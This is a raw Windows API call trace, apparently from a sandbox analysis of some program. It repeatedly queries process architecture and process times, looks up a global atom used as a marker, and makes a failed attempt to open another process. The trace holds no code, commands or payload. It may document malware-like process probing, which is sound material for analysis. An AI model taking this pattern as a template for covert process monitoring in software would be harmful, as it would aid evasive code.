	[0121.474] CloseHandle (hObject=0x698) returned 1
	[0121.474] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.474] CloseHandle (hObject=0x698) returned 1
	[0121.474] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.474] CloseHandle (hObject=0x698) returned 1
	[0121.475] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.475] CloseHandle (hObject=0x698) returned 1
	[0121.507] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.507] CloseHandle (hObject=0x698) returned 1
	[0121.508] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.508] CloseHandle (hObject=0x698) returned 1
	[0121.508] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.508] CloseHandle (hObject=0x698) returned 1
	[0121.508] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.508] CloseHandle (hObject=0x698) returned 1
	[0121.508] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.508] CloseHandle (hObject=0x698) returned 1
	[0121.508] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.508] CloseHandle (hObject=0x698) returned 1
	[0121.509] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.509] CloseHandle (hObject=0x698) returned 1
	[0121.509] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.509] CloseHandle (hObject=0x698) returned 1
	[0121.510] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.510] CloseHandle (hObject=0x698) returned 1
	[0121.510] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.510] CloseHandle (hObject=0x698) returned 1
	[0121.510] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.510] CloseHandle (hObject=0x698) returned 1
	[0121.510] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.510] CloseHandle (hObject=0x698) returned 1
	[0121.510] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.510] CloseHandle (hObject=0x698) returned 1
	[0121.511] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.511] CloseHandle (hObject=0x698) returned 1
	[0121.511] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.511] CloseHandle (hObject=0x698) returned 1
	[0121.511] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.511] CloseHandle (hObject=0x698) returned 1
	[0121.511] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.511] CloseHandle (hObject=0x698) returned 1
	[0121.512] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.512] CloseHandle (hObject=0x698) returned 1
	[0121.512] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.512] CloseHandle (hObject=0x698) returned 1
	[0121.512] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.512] CloseHandle (hObject=0x698) returned 1
	[0121.512] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.512] CloseHandle (hObject=0x698) returned 1
	[0121.512] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.512] CloseHandle (hObject=0x698) returned 1
	[0121.513] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.513] CloseHandle (hObject=0x698) returned 1
	[0121.513] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.513] CloseHandle (hObject=0x698) returned 1
	[0121.513] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.513] CloseHandle (hObject=0x698) returned 1
	[0121.513] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.513] CloseHandle (hObject=0x698) returned 1
	[0121.514] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.514] CloseHandle (hObject=0x698) returned 1
	[0121.514] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.514] CloseHandle (hObject=0x698) returned 1
	[0121.514] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.514] CloseHandle (hObject=0x698) returned 1
	[0121.514] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.514] CloseHandle (hObject=0x698) returned 1
	[0121.514] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.514] CloseHandle (hObject=0x698) returned 1
	[0121.515] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.515] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0121.515] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0121.515] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.516] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0121.516] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.516] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0121.516] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0121.516] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0121.516] CloseHandle (hObject=0x698) returned 1
	[0121.516] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0121.516] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.517] CloseHandle (hObject=0x698) returned 1
	[0121.517] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.517] CloseHandle (hObject=0x698) returned 1
	[0121.517] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.517] CloseHandle (hObject=0x698) returned 1
	[0121.517] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.517] CloseHandle (hObject=0x698) returned 1
	[0121.550] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.551] CloseHandle (hObject=0x698) returned 1
	[0121.551] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.551] CloseHandle (hObject=0x698) returned 1
	[0121.551] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.551] CloseHandle (hObject=0x698) returned 1
	[0121.552] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.552] CloseHandle (hObject=0x698) returned 1
	[0121.552] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.552] CloseHandle (hObject=0x698) returned 1
	[0121.552] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.552] CloseHandle (hObject=0x698) returned 1
	[0121.552] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.552] CloseHandle (hObject=0x698) returned 1
	[0121.552] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.552] CloseHandle (hObject=0x698) returned 1
	[0121.553] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.553] CloseHandle (hObject=0x698) returned 1
	[0121.553] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.553] CloseHandle (hObject=0x698) returned 1
	[0121.553] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.553] CloseHandle (hObject=0x698) returned 1
	[0121.553] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.553] CloseHandle (hObject=0x698) returned 1
	[0121.553] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.554] CloseHandle (hObject=0x698) returned 1
	[0121.554] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.554] CloseHandle (hObject=0x698) returned 1
	[0121.554] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.554] CloseHandle (hObject=0x698) returned 1
	[0121.554] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.554] CloseHandle (hObject=0x698) returned 1
	[0121.554] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.554] CloseHandle (hObject=0x698) returned 1
	[0121.554] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.554] CloseHandle (hObject=0x698) returned 1
	[0121.555] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.555] CloseHandle (hObject=0x698) returned 1
	[0121.555] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.555] CloseHandle (hObject=0x698) returned 1
	[0121.555] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.555] CloseHandle (hObject=0x698) returned 1
	[0121.555] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.555] CloseHandle (hObject=0x698) returned 1
	[0121.555] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.555] CloseHandle (hObject=0x698) returned 1
	[0121.556] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.556] CloseHandle (hObject=0x698) returned 1
	[0121.556] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.556] CloseHandle (hObject=0x698) returned 1
	[0121.556] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.556] CloseHandle (hObject=0x698) returned 1
	[0121.556] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.556] CloseHandle (hObject=0x698) returned 1
	[0121.556] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.556] CloseHandle (hObject=0x698) returned 1
	[0121.557] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.557] CloseHandle (hObject=0x698) returned 1
	[0121.557] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.557] CloseHandle (hObject=0x698) returned 1
	[0121.557] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.557] CloseHandle (hObject=0x698) returned 1
	[0121.557] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.558] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0121.558] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0121.558] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.558] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0121.558] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.559] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0121.559] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0121.559] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0121.559] CloseHandle (hObject=0x698) returned 1
	[0121.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0121.559] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.559] CloseHandle (hObject=0x698) returned 1
	[0121.560] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.560] CloseHandle (hObject=0x698) returned 1
	[0121.560] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.560] CloseHandle (hObject=0x698) returned 1
	[0121.560] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.560] CloseHandle (hObject=0x698) returned 1
	[0121.593] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.593] CloseHandle (hObject=0x698) returned 1
	[0121.593] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.594] CloseHandle (hObject=0x698) returned 1
	[0121.594] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.594] CloseHandle (hObject=0x698) returned 1
	[0121.594] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.594] CloseHandle (hObject=0x698) returned 1
	[0121.594] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.594] CloseHandle (hObject=0x698) returned 1
	[0121.594] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.594] CloseHandle (hObject=0x698) returned 1
	[0121.594] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.595] CloseHandle (hObject=0x698) returned 1
	[0121.595] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.595] CloseHandle (hObject=0x698) returned 1
	[0121.595] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.595] CloseHandle (hObject=0x698) returned 1
	[0121.595] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.595] CloseHandle (hObject=0x698) returned 1
	[0121.595] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.595] CloseHandle (hObject=0x698) returned 1
	[0121.596] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.596] CloseHandle (hObject=0x698) returned 1
	[0121.596] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.596] CloseHandle (hObject=0x698) returned 1
	[0121.596] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.596] CloseHandle (hObject=0x698) returned 1
	[0121.596] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.596] CloseHandle (hObject=0x698) returned 1
	[0121.596] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.596] CloseHandle (hObject=0x698) returned 1
	[0121.597] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.597] CloseHandle (hObject=0x698) returned 1
	[0121.597] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.597] CloseHandle (hObject=0x698) returned 1
	[0121.597] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.597] CloseHandle (hObject=0x698) returned 1
	[0121.597] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.597] CloseHandle (hObject=0x698) returned 1
	[0121.597] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.597] CloseHandle (hObject=0x698) returned 1
	[0121.598] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.598] CloseHandle (hObject=0x698) returned 1
	[0121.598] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.598] CloseHandle (hObject=0x698) returned 1
	[0121.598] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.598] CloseHandle (hObject=0x698) returned 1
	[0121.598] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.598] CloseHandle (hObject=0x698) returned 1
	[0121.598] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.599] CloseHandle (hObject=0x698) returned 1
	[0121.599] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.599] CloseHandle (hObject=0x698) returned 1
	[0121.599] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.599] CloseHandle (hObject=0x698) returned 1
	[0121.599] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.600] CloseHandle (hObject=0x698) returned 1
	[0121.600] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.600] CloseHandle (hObject=0x698) returned 1
	[0121.600] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.600] CloseHandle (hObject=0x698) returned 1
	[0121.600] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.601] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0121.601] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0121.601] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.601] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0121.601] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.602] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0121.602] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0121.602] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0121.602] CloseHandle (hObject=0x698) returned 1
	[0121.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0121.602] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.602] CloseHandle (hObject=0x698) returned 1
	[0121.602] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.602] CloseHandle (hObject=0x698) returned 1
	[0121.603] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.603] CloseHandle (hObject=0x698) returned 1
	[0121.603] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.603] CloseHandle (hObject=0x698) returned 1
	[0121.636] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.636] CloseHandle (hObject=0x698) returned 1
	[0121.636] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.636] CloseHandle (hObject=0x698) returned 1
	[0121.636] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.636] CloseHandle (hObject=0x698) returned 1
	[0121.636] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.636] CloseHandle (hObject=0x698) returned 1
	[0121.637] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.637] CloseHandle (hObject=0x698) returned 1
	[0121.637] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.637] CloseHandle (hObject=0x698) returned 1
	[0121.637] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.637] CloseHandle (hObject=0x698) returned 1
	[0121.637] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.637] CloseHandle (hObject=0x698) returned 1
	[0121.638] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.638] CloseHandle (hObject=0x698) returned 1
	[0121.638] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.638] CloseHandle (hObject=0x698) returned 1
	[0121.638] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.638] CloseHandle (hObject=0x698) returned 1
	[0121.638] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.638] CloseHandle (hObject=0x698) returned 1
	[0121.638] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.638] CloseHandle (hObject=0x698) returned 1
	[0121.639] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.639] CloseHandle (hObject=0x698) returned 1
	[0121.639] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.639] CloseHandle (hObject=0x698) returned 1
	[0121.639] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.639] CloseHandle (hObject=0x698) returned 1
	[0121.639] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.639] CloseHandle (hObject=0x698) returned 1
	[0121.639] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.639] CloseHandle (hObject=0x698) returned 1
	[0121.640] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.640] CloseHandle (hObject=0x698) returned 1
	[0121.640] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.640] CloseHandle (hObject=0x698) returned 1
	[0121.640] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.641] CloseHandle (hObject=0x698) returned 1
	[0121.641] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.641] CloseHandle (hObject=0x698) returned 1
	[0121.641] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.641] CloseHandle (hObject=0x698) returned 1
	[0121.641] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.641] CloseHandle (hObject=0x698) returned 1
	[0121.641] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.641] CloseHandle (hObject=0x698) returned 1
	[0121.642] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.642] CloseHandle (hObject=0x698) returned 1
	[0121.642] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.642] CloseHandle (hObject=0x698) returned 1
	[0121.642] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.642] CloseHandle (hObject=0x698) returned 1
	[0121.642] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.642] CloseHandle (hObject=0x698) returned 1
	[0121.642] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.642] CloseHandle (hObject=0x698) returned 1
	[0121.643] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.643] CloseHandle (hObject=0x698) returned 1
	[0121.643] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.643] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0121.643] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0121.644] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.644] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0121.644] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.644] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0121.644] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0121.644] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0121.644] CloseHandle (hObject=0x698) returned 1
	[0121.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0121.645] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.645] CloseHandle (hObject=0x698) returned 1
	[0121.645] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.645] CloseHandle (hObject=0x698) returned 1
